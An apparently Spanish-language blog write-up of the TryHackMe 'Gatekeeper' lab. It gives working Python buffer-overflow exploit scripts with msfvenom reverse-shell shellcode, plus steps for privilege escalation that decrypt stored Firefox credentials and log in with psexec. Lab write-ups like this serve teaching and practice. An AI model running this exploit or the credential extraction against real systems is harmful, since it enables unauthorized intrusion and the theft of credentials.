<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="">
<meta name="description" content="Enumeración En la etapa de enumeración, vamos a escanear los puertos de la máquina para saber de que se puede tratar.
scan IP (script para escanear puertos)
nmap -T4 -sS -sV IP
Gracias a esto escubrimos que se trata de una máquina Windows 7 y que en el puerto 31337 la máquina está trabajando en algo, vamos a ver que contiene.
nc -nv IP 31337
Podemos observar que cada vez que metemos un dato como por ejemplo &amp;ldquo;Juan&amp;rdquo;, la máquina t va a responder &amp;ldquo;Hello Juan!" />
<meta name="keywords" content="homepage, blog, science, informatics, programming, hacking, pentesting" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="#252627" />
<link rel="canonical" href="/posts/gatekeeper/" />


    <title>
        
            [ TRYHACKME ] GATEKEEPER :: [ H4NS&#39; BLOG ] 
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.5.0/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="/main.d7bdd8ee18bfbf4c605488a7e5b1b92cd980dfeed2bdaeab4dd5e931a7a78bc0.css">






<meta itemprop="name" content="[ TRYHACKME ] GATEKEEPER">
<meta itemprop="description" content="Enumeración En la etapa de enumeración, vamos a escanear los puertos de la máquina para saber de que se puede tratar.
scan IP (script para escanear puertos)
nmap -T4 -sS -sV IP
Gracias a esto escubrimos que se trata de una máquina Windows 7 y que en el puerto 31337 la máquina está trabajando en algo, vamos a ver que contiene.
nc -nv IP 31337
Podemos observar que cada vez que metemos un dato como por ejemplo &ldquo;Juan&rdquo;, la máquina t va a responder &ldquo;Hello Juan!"><meta itemprop="datePublished" content="2021-03-28T13:17:53&#43;02:00" />
<meta itemprop="dateModified" content="2021-03-28T13:17:53&#43;02:00" />
<meta itemprop="wordCount" content="1670"><meta itemprop="image" content="/"/>
<meta itemprop="keywords" content="" />
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="/"/>

<meta name="twitter:title" content="[ TRYHACKME ] GATEKEEPER"/>
<meta name="twitter:description" content="Enumeración En la etapa de enumeración, vamos a escanear los puertos de la máquina para saber de que se puede tratar.
scan IP (script para escanear puertos)
nmap -T4 -sS -sV IP
Gracias a esto escubrimos que se trata de una máquina Windows 7 y que en el puerto 31337 la máquina está trabajando en algo, vamos a ver que contiene.
nc -nv IP 31337
Podemos observar que cada vez que metemos un dato como por ejemplo &ldquo;Juan&rdquo;, la máquina t va a responder &ldquo;Hello Juan!"/>








    <meta property="article:published_time" content="2021-03-28 13:17:53 &#43;0200 CEST" />








    </head>

    
        <body>
    
    
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">#</span>
            <span class="logo__text">cd /home</span>
            <span class="logo__cursor" style=
                  "
                   
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="/about">About me</a></li><li><a href="/posts">Blog</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            
        </span>
    </span>
</header>


            <div class="content">
                
  <main class="post">

    <div class="post-info">
      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock">
          <circle cx="12" cy="12" r="10"></circle>
          <polyline points="12 6 12 12 16 14"></polyline>
        </svg>
        8 minutes

        
      </p>
    </div>

    <article>
      <h1 class="post-title">
        <a href="/posts/gatekeeper/">[ TRYHACKME ] GATEKEEPER</a>
      </h1>

      

      

      <div class="post-content">
        <h1 id="enumeración">Enumeración</h1>
<p>En la etapa de enumeración, vamos a escanear los puertos de la máquina para saber de que se puede tratar.</p>
<p><code>scan IP (script para escanear puertos)</code></p>
<p><code>nmap -T4 -sS -sV IP</code></p>
<p><img src="https://i.imgur.com/1Zl0Yx8.jpg" alt=""></p>
<p>Gracias a esto escubrimos que se trata de una máquina Windows 7 y que en el puerto 31337 la máquina está trabajando en algo, vamos a ver que contiene.</p>
<p><code>nc -nv IP 31337</code></p>
<p>Podemos observar que cada vez que metemos un dato como por ejemplo &ldquo;Juan&rdquo;, la máquina t va a responder &ldquo;Hello Juan!!!&rdquo;.</p>
<p>Gracias a esto sabemos que se trata de un Buffer Overflow donde al meterle muchos datos (como A*40), la máquina se va a colapsar.</p>
<p>Esto lo veremos más adelante cuando esté corriendo el binario en Inmunity Debugger.</p>
<h1 id="conexión">Conexión</h1>
<p>Vemos que en el puerto 3389 está corriendo el servidor samba, por lo tanto vamos a conectarnos.</p>
<p><code>smbclient -L \\\IP\\</code></p>
<p><img src="https://i.imgur.com/54j1wkH.jpg" alt=""></p>
<p>Vamos a entrar a la carpeta Users para ver que contiene.</p>
<p><code>smbclient \\\\IP\\Users</code></p>
<p><img src="https://i.imgur.com/txO5kPP.jpg" alt=""></p>
<p>Ya tenemos el archivo gatekeeper.exe en nuestra máquina Kali.</p>
<h1 id="máquina-windows">Máquina Windows</h1>
<p>Para seguir la room, tenemos que tener instalado Inmunity Debugger, mona y tener la versión de python 2.7.1.</p>
<p>Como sabemos que se trata de un Buffer Overflow, vamos a transferir el archivo de nuestra máquina Kali a nuestra máquina Windows (mejor que sea Win7 o anterior). Esto lo podemos hacer a través de smbserver.py.</p>
<p>Una vez esté transferido, vamos a abrirlo en Inmunity Debugger, el cual nos va a ayudar a explotar nuestro binario.</p>
<h1 id="explotación">Explotación</h1>
<p><strong>LA IP DE LA ROOM HA CAMBIADO DEBIDO A QUE TUVE QUE HACER EL WRITE-UP EN 2 DIAS DIFERENTES</strong></p>
<p>Para comenzar la etapa explotación vamos a poner a correr el binario en Inmunity Debugger. Despues de este paso vamos a repetir el paso que dije en la enumeración: <code>nc -nv IP 31337</code>, le ponemos un input de A*40 y volvemos al binario para ver que ha pasado: correcto, ha colapsado.</p>
<p>Como no sabemos exactamente en que número de bytes colapsa, vamos a fuzear el binario.</p>
<p>Volvemos a correr el binario y tiramos el comando:</p>
<blockquote>
<p>python fuzzer.py</p>
</blockquote>
<p>Gracias a Victor Garcia vamos a crear el script de fuzzing, por aquí os dejo el video donde resuelve esta misma máquina.</p>
<p>Video: <a href="https://youtu.be/DFhQm8pxN_E">https://youtu.be/DFhQm8pxN_E</a></p>
<p>Fuzzer.py:</p>
<pre><code>import socket, sys

ip = &quot;ip de la máquina de Windows&quot;
port = 31337
buffer = ['A']
counter = 100

while len(buffer) &lt;= 10:
    buffer.append('A' * counter)
    counter = counter + 100

try:
    for string in buffer: 
        print(&quot;Fuzzing with %s bytes&quot; % len(string)) 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send(string + &quot;\r\n&quot;)
        s.recv(1024)
        print &quot;Listo&quot;
except:
    print(&quot;Could not connect to &quot; + ip + &quot;:&quot; + str(port))
    sys.exit(0)
finally:
    s.close()
</code></pre><p><img src="https://i.imgur.com/G67w08n.png" alt=""></p>
<p>Al tirarlo en nuestra máquina Kali hará que colapse el binario en 200 bytes, aproximandamente. Siempre tenemos que coger el número más grande.</p>
<p>Ahora que ya sabemos en cuantos bytes colapsa, vamos a tirar el siguiente comando en Kali para crear un único patrón, el cual gracias a él vamos a identificar el número exacto de bytes.</p>
<p><code>/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200</code></p>
<p><img src="https://i.imgur.com/xlQseNf.png" alt=""></p>
<p>EL output vamos a copiarlo en el siguiente archivo, en la variable &lsquo;buffer&rsquo;.</p>
<p>bof.py:</p>
<pre><code>#!/usr/bin/python
import sys, socket

ip = 'ip de la máquina Windows'
port = 31337
buffer = &quot;&quot;

try:
    print '[+] Sending buffer'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))  
    s.send(buffer + '\r\n')
    s.recv(1024)
except:
    print '[!] The program cant be reached'
    sys.exit(0)
finally:
    s.close()

</code></pre><p>Una vez lo tengamos listo, vamos a volver a correr el binario y a tirar el comando:</p>
<blockquote>
<p>python bof.py</p>
</blockquote>
<p>Esto va a colapsar el binario y nos va a mandar un EIP diferente a 41414141, en este caso es 39654138.</p>
<blockquote>
<p>Nota: 41 es &ldquo;A&rdquo; en lenguaje hexadecimal, 42 es &ldquo;B&rdquo; y 43 es &ldquo;C&rdquo;.</p>
</blockquote>
<p>Esta dirección de memoria vamos a utilizarla para sacar el número concreto de bytes.</p>
<p>En Inmunity Debugger vamos a escribir el comando:</p>
<p><code>!mona patter_offset 39654138</code></p>
<p><img src="https://i.imgur.com/DGXxRGc.png" alt=""></p>
<p>Ahora que tenemos el número exacto de bytes, vamos a cambiar la variable del buffer de nuestro archivo bof.py.</p>
<p><code>buffer = &quot;A&quot;*146 + &quot;B&quot;*4 + &quot;C&quot;*100</code></p>
<p>Volvemos a reinicar el binario y tiramos el comando &lsquo;python bof.py&rsquo;.</p>
<p><img src="https://i.imgur.com/wnPohoe.jpg" alt=""></p>
<p>Vemos que ahora el valor de EIP ha cambiado a 42424242 y que hemos enviado la A, la B y la C (esto lo podemos ver en el stack o pila).</p>
<h1 id="identificación-de-bad-characters">Identificación de bad characters</h1>
<p>En primer lugar tenemos que generar una lista en hexadecimal con los carácteres ASCII de 0 a 255. Por aquí os dejo el archivo que los genera:</p>
<p>badchars.py:</p>
<pre><code>from __future__ import print_function

for x in range(1, 256):
    print(&quot;\\x&quot; + &quot;{:02x}&quot;.format(x), end='')

print()
</code></pre><p>Tiramos el comando &lsquo;python badchars.py&rsquo; y pasamos el output a la variable badchars del archivo bof.py.</p>
<p>Así es como tendría que quedar el principio de nuestro archivo bof.py:</p>
<p><img src="https://i.imgur.com/XEdB7sM.png" alt=""></p>
<p>Reiniciamos el binario y tiramos el comando, python bof.py.</p>
<p>Hemos vuelto a crashear el binario y en este caso tenemos que dumpear el valor de ESP y empezar a mirar el array de badchars volcado.</p>
<p><img src="https://i.imgur.com/YiEno8J.png" alt=""></p>
<p>Podemos observar que existe un 00 despues de un 09, el cual estaría mal, porque si observamos nuestra variable badchars, despues del \x09 va el \x0a.</p>
<p><img src="https://i.imgur.com/wH8fvgd.png" alt=""></p>
<p>Por lo tanto vamos a eliminar el valor \x0a.</p>
<p>Volvemos a repetir el mismo proceso y podemos comprobar que ya nos aparece nuestro array sin problemas, en teoria ya nos ha interpretado todos los carácteres malos.</p>
<p><img src="https://i.imgur.com/n3tyaGf.jpg" alt=""></p>
<p>En el caso de que hubiera más badchars, volveriamos a repetir todo el proceso de buscar y eliminar hasta que tuvieramos nuestro array dumpeado sin ningún problema, el cual tiene que llegar hasta el valor FF (de 0 a 255).</p>
<h1 id="buscar-instrucción-de-salto-a-esp">Buscar instrucción de salto a ESP</h1>
<p>Sabemos que en ESP está todo nuestro código malicioso y por lo tanto tenemos que movernos ahí para que se ejecute nuestro código.</p>
<p>Esto lo vamos a hacer mediante el comando, escrito en Inmunity:</p>
<p><code>!mona jmp -r esp</code></p>
<p><img src="https://i.imgur.com/zpryggj.png" alt=""></p>
<p>Vemos que ha encontrado dos direcciones de memoria que tienen la instrucción: jmp esp.</p>
<p>Cogemos la primera dirección y vemos que está escrita en big endian, por lo tanto vamos a pasarla a little endian para pasarla a nuestro script.</p>
<p><img src="https://i.imgur.com/hu8ZGVm.png" alt=""></p>
<p>Nuestro código quedaría así:</p>
<p><img src="https://i.imgur.com/npooBZW.jpg" alt=""></p>
<h1 id="generar-nuestra-shellcode">Generar nuestra shellcode</h1>
<p>Tiramos el siguiente comando en Kali y copiamos su output:</p>
<p><code>msfvenom -p windows/shell_reverse_tcp LHOST=&lt;IP de kali&gt; LPORT=443 EXITFUNC=thread -b &quot;\x00\x0a&quot; -f python</code></p>
<p>Esto nos va a permitir abrir un intérprete de comandos, también conocido como shell.</p>
<p>Los NOPs que vamos a poner son: &ldquo;\x90&rdquo;*20, debido a que estos nos permiten que la ejecución continue hasta que se encuentre algo que ejecutar, actúa de protección para que no falle el exploit.</p>
<p>Así es como quedaría nuestro código en bof.py:</p>
<pre><code>#!/usr/bin/python
import sys, socket

ip = 'ip de Windows'
port = 31337
buf =  b&quot;&quot;
buf += b&quot;\xda\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x52\xbf\x34&quot;
buf += b&quot;\x8f\x76\xe7\x83\xc6\x04\x31\x7e\x13\x03\x4a\x9c\x94&quot;
buf += b&quot;\x12\x4e\x4a\xda\xdd\xae\x8b\xbb\x54\x4b\xba\xfb\x03&quot;
buf += b&quot;\x18\xed\xcb\x40\x4c\x02\xa7\x05\x64\x91\xc5\x81\x8b&quot;
buf += b&quot;\x12\x63\xf4\xa2\xa3\xd8\xc4\xa5\x27\x23\x19\x05\x19&quot;
buf += b&quot;\xec\x6c\x44\x5e\x11\x9c\x14\x37\x5d\x33\x88\x3c\x2b&quot;
buf += b&quot;\x88\x23\x0e\xbd\x88\xd0\xc7\xbc\xb9\x47\x53\xe7\x19&quot;
buf += b&quot;\x66\xb0\x93\x13\x70\xd5\x9e\xea\x0b\x2d\x54\xed\xdd&quot;
buf += b&quot;\x7f\x95\x42\x20\xb0\x64\x9a\x65\x77\x97\xe9\x9f\x8b&quot;
buf += b&quot;\x2a\xea\x64\xf1\xf0\x7f\x7e\x51\x72\x27\x5a\x63\x57&quot;
buf += b&quot;\xbe\x29\x6f\x1c\xb4\x75\x6c\xa3\x19\x0e\x88\x28\x9c&quot;
buf += b&quot;\xc0\x18\x6a\xbb\xc4\x41\x28\xa2\x5d\x2c\x9f\xdb\xbd&quot;
buf += b&quot;\x8f\x40\x7e\xb6\x22\x94\xf3\x95\x2a\x59\x3e\x25\xab&quot;
buf += b&quot;\xf5\x49\x56\x99\x5a\xe2\xf0\x91\x13\x2c\x07\xd5\x09&quot;
buf += b&quot;\x88\x97\x28\xb2\xe9\xbe\xee\xe6\xb9\xa8\xc7\x86\x51&quot;
buf += b&quot;\x28\xe7\x52\xf5\x78\x47\x0d\xb6\x28\x27\xfd\x5e\x22&quot;
buf += b&quot;\xa8\x22\x7e\x4d\x62\x4b\x15\xb4\xe5\x7e\xea\xb4\xfc&quot;
buf += b&quot;\x16\xe8\xb8\xff\x5d\x65\x5e\x95\xb1\x20\xc9\x02\x2b&quot;
buf += b&quot;\x69\x81\xb3\xb4\xa7\xec\xf4\x3f\x44\x11\xba\xb7\x21&quot;
buf += b&quot;\x01\x2b\x38\x7c\x7b\xfa\x47\xaa\x13\x60\xd5\x31\xe3&quot;
buf += b&quot;\xef\xc6\xed\xb4\xb8\x39\xe4\x50\x55\x63\x5e\x46\xa4&quot;
buf += b&quot;\xf5\x99\xc2\x73\xc6\x24\xcb\xf6\x72\x03\xdb\xce\x7b&quot;
buf += b&quot;\x0f\x8f\x9e\x2d\xd9\x79\x59\x84\xab\xd3\x33\x7b\x62&quot;
buf += b&quot;\xb3\xc2\xb7\xb5\xc5\xca\x9d\x43\x29\x7a\x48\x12\x56&quot;
buf += b&quot;\xb3\x1c\x92\x2f\xa9\xbc\x5d\xfa\x69\xdc\xbf\x2e\x84&quot;
buf += b&quot;\x75\x66\xbb\x25\x18\x99\x16\x69\x25\x1a\x92\x12\xd2&quot;
buf += b&quot;\x02\xd7\x17\x9e\x84\x04\x6a\x8f\x60\x2a\xd9\xb0\xa0&quot;
buffer = &quot;A&quot;*146 + &quot;\xc3\x14\x04\x08&quot; + &quot;\x90&quot;*20 + buf

try:
    print '[+] Sending buffer'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(buffer + '\r\n')
    s.recv(1024)
except:
    print '[!] The program cant be reached'
    sys.exit(0)
finally:
    s.close()
</code></pre><h1 id="obtenemos-la-reverse-shell">Obtenemos la reverse shell</h1>
<p>Volvemos a reiniciar el binario, ponemos el puerto 443 a la escucha y tiramos el comando &lsquo;python bof.py&rsquo;.</p>
<p><img src="https://i.imgur.com/GEfIfoX.jpg" alt=""></p>
<p>Listo, ya tendriamos nuestra reverse shell. Pero, estamos tirando el exploit contra nuestra máquina windows, por lo tanto vamos a cambiar el shellcode y la ip para tirarselo a la ip de la máquina de tryhackme.</p>
<p>Generamos otra shellcode con el mismo comando que antes pero ahora con la ip de openvpn y volvemos a repetir el proceso anterior (ponemos el puerto 443 a la escucha y tiramos el exploit).</p>
<p><img src="https://i.imgur.com/PiBb3Oq.jpg" alt=""></p>
<p>Listo, ahora si que tenemos la reverse shell que estábamos buscando.</p>
<p>Ahora solo tenemos que hacer un type o un more y ya tendriamos la primera flag que nos pide (user.txt.txt):</p>
<p><code>more user.txt.txt</code></p>
<p><img src="https://i.imgur.com/dU0aWc9.jpg" alt=""></p>
<h1 id="escalada-de-privilegios">Escalada de privilegios</h1>
<p>Nos dirigimos a la ruta tmp <code>cd %tmp%</code> para importar el archivo winPEAS.bat y realizar una enumeración a la máquina Windows de tryhackme para ver lo que nos encontramos.</p>
<blockquote>
<p>Puedes descargar winPEAS gracias a este repositorio: <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS">https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS</a></p>
</blockquote>
<p>Transferimos gracias a smbserver.py a través del recurso compartido a, el archivo winPEAS.bat:</p>
<p><img src="https://i.imgur.com/MAkVvWv.jpg" alt=""></p>
<p>Una vez que lo tenemos en la máquina, lo lanzamos.</p>
<blockquote>
<p>winPEAS.bat</p>
</blockquote>
<p>Una vez que carga todo el output, nos vamos al apartado de INSTALLED SOFTWARE y vemos que está descargado el navegador &lsquo;Mozilla Firefox&rsquo; cuando no viene por determinado en una máquina Windows.</p>
<p>Por lo tanto parece que la cosa pinta mejor cuando encontramos unos archivos sospechosos el cual están en el apartado de CREDENTIALS y parece que tienen relación directa con Firefox:</p>
<p><img src="https://i.imgur.com/aMVg7WH.png" alt=""></p>
<p>Los 4 primeros archivos parecen sospechosos, sobre todo el que se llama key4.db. Vamos a moverlos a nuestra máquina y desencriptarlos gracias a la herramienta firefox_decrypt.py el cual podemos descargar a través del siguiente enlace: <a href="https://github.com/unode/firefox_decrypt">https://github.com/unode/firefox_decrypt</a></p>
<p>En primer lugar, nos dirigimos a la ruta en donde se encuentran y los movemos a nuestra máquina (<strong>transferimos los 4 archivos debido a que la herramienta firefox_decrypt analiza de 4 en 4</strong>).</p>
<p>Yo lo voy a hacer a través de smbserver.py, aunque tambien se puede a través de http.server, aquí te dejo una página donde explica todo lo relacionado a transferencia de archivos: <a href="https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65">https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65</a></p>
<p>Una vez transferidos vamos a poner en marcha la tool firefox_decrypt:</p>
<p><img src="https://i.imgur.com/Tvmvggx.png" alt=""></p>
<p>Ya tenemos la contraseña de mayor, el root de la máquina. Ya solo nos queda conectarnos a la máquina a través de psexec.py (nos va a permitir crear una shell a través de credenciales) y ya tendriamos la bandera de root.txt.txt:</p>
<p><img src="https://i.imgur.com/IY3aeUT.jpg" alt=""></p>
<p>Existen más máquinas relacionadas a esta en tryhackme, como por ejemplo:</p>
<p>Brainstorm: <a href="https://tryhackme.com/room/brainstorm">https://tryhackme.com/room/brainstorm</a>
Buffer Overflow Prep: <a href="https://tryhackme.com/room/bufferoverflowprep">https://tryhackme.com/room/bufferoverflowprep</a></p>
<p>Espero que os haya gustado.</p>
<p>Queria volver a dar las gracias Victor Garcia por aclararme más todo sobre el tema de la explotación de Buffer Overflow, podeis pasaros por su canal si quereis saber más sobre este tema.</p>
<p>Canal: <a href="https://www.youtube.com/channel/UCjNHFaBm_0-Mo749MB3A9cQ">https://www.youtube.com/channel/UCjNHFaBm_0-Mo749MB3A9cQ</a></p>

      </div>
    </article>

    <hr />

    <div class="post-info">
      
      

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text">
          <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path>
          <polyline points="14 2 14 8 20 8"></polyline>
          <line x1="16" y1="13" x2="8" y2="13"></line>
          <line x1="16" y1="17" x2="8" y2="17"></line>
          <polyline points="10 9 9 9 8 9"></polyline>
        </svg>
        1670 Words
      </p>

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar">
          <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>
          <line x1="16" y1="2" x2="16" y2="6"></line>
          <line x1="8" y1="2" x2="8" y2="6"></line>
          <line x1="3" y1="10" x2="21" y2="10"></line>
        </svg>
        
          2021-03-28 13:17 &#43;0200
        

         
          
        
      </p>
    </div>

    
    <div class="pagination">
        <div class="pagination__title">
            <span class="pagination__title-h"></span>
            <hr />
        </div>

        <div class="pagination__buttons">
            

            
            <span class="button next">
                <a href="/posts/internal/">
                    <span class="button__text">[ TRYHACKME ] INTERNAL</span>
                    <span class="button__icon">→</span>
                </a>
            </span>
            
        </div>
    </div>


    

    

  </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2021</span>
            
            <span><a href="/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
            <span>Powered by <a href="http://gohugo.io">Hugo</a></span>
            <span>Made with &#10084; by <a href="https://github.com/rhazdon">Djordje Atlialp</a></span>
          </div>
    </div>
</footer>

            
        </div>

        



<script type="text/javascript" src="/bundle.min.2ce64ea6ea44a72b13dd812fc2eb5cca3efe878cce258a47c137c17edf46e0602a05e422b618a5b80b5939c731b7a293351c2f2222a21f6ee27e54a8448dd20e.js" integrity="sha512-LOZOpupEpysT3YEvwutcyj7&#43;h4zOJYpHwTfBft9G4GAqBeQithiluAtZOccxt6KTNRwvIiKiH27iflSoRI3SDg=="></script>



    </body>
</html>
